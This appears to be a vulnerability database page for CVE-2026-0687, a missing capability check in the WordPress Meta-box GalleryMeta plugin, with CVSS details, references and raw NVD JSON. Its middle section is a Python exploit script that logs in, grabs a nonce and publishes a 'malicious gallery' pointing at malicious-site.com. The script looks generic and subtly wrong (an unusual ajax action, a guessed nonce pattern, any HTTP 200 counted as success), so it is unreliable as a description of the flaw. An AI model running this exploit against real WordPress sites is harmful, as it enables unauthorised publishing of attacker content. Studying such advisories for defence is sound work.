CVE-2026-0687

Description

The Meta-box GalleryMeta plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mb_gallery' custom post type in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Author-level access and above, to create and publish galleries.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Meta-box GalleryMeta plugin for WordPress <= 3.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-0687 PoC - WordPress Meta-box GalleryMeta Unauthorized Gallery Creation
# Target: WordPress site with Meta-box GalleryMeta plugin <= 3.0.1

def create_malicious_gallery(target_url, username, password, gallery_title, gallery_content):
    """
    Exploit for CVE-2026-0687
    Creates and publishes a gallery without proper authorization check
    """
    session = requests.Session()
    login_url = f"{target_url}/wp-login.php"
    
    # Step 1: Authenticate as Author-level user
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url,
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Create mb_gallery post type without proper capability check
    create_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # First, create the gallery post
    nonce_response = session.get(f"{target_url}/wp-admin/post-new.php?post_type=mb_gallery")
    
    # Extract nonce from response
    import re
    nonce_match = re.search(r'wpAjax_nonce\s*=\s*"([a-f0-9]+)"', nonce_response.text)
    ajax_nonce = nonce_match.group(1) if nonce_match else ''
    
    # Create gallery post
    post_data = {
        'action': 'save-post',
        'post_type': 'mb_gallery',
        'post_title': gallery_title,
        'post_content': gallery_content,
        'post_status': 'publish',
        '_ajax_nonce': ajax_nonce,
        'mb_gallery_images': 'https://malicious-site.com/payload.jpg'
    }
    
    response = session.post(create_url, data=post_data)
    
    if 'success' in response.text or response.status_code == 200:
        print(f"[+] Malicious gallery created and published: {gallery_title}")
        return True
    else:
        print("[-] Failed to create gallery")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <gallery_title>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    title = sys.argv[4]
    
    create_malicious_gallery(target, user, pwd, title, 'Malicious content injected via CVE-2026-0687')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0687
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0687
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0687/
[4] VulDB https://vuldb.com/cve/CVE-2026-0687
[5] https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L375
[6] https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/include/posttype.php#L29
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/872c61aa-c95c-4b86-8e39-8112bb117a0b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0687", "sourceIdentifier": "[email protected]", "published": "2026-01-24T09:15:53.023", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Meta-box GalleryMeta plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mb_gallery' custom post type in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Author-level access and above, to create and publish galleries."}, {"lang": "es", "value": "El plugin Meta-box GalleryMeta para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en el tipo de publicación personalizado 'mb_gallery' en todas las versiones hasta la 3.0.1, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Autor y superior, creen y publiquen galerías."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L375", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/include/posttype.php#L29", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/872c61aa-c95c-4b86-8e39-8112bb117a0b?source=cve", "source": "[email protected]"}]}}